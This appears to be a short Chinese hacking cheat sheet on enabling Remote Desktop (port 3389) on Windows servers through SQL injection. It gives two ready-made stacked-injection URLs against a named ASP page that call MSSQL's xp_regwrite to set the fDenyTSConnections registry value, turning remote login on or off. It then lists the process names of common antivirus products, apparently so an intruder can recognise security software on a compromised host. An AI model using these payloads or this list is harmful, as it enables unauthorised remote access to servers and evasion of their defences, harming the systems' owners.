(( SQL语句直接开启3389 ))

 

3389登陆关键注册表位置：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections

 

其中键值DenyTSConnections 直接控制着3389的开启和关闭，当该键值为0表示3389开启，1则

 

表示关闭。

 

而MSSQL的xp_regwrite的存储过程可以对注册进行修改，我们使用这点就可以简单的修改DenyTSConnections键值，从而控制3389的关闭和开启。

 

开启3389的SQL语句：

syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--

 

关闭3389的SQL语句：

syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;--

 

 

 

 

 

(( 常见杀软 ))

 

360tray.exe 360实时保护

 

ZhuDongFangYu.exe 360主动防御

 

KSafeTray.exe 金山卫士

 

McAfee McShield.exe 麦咖啡

 

SafeDogUpdateCenter.exe 服务器安全狗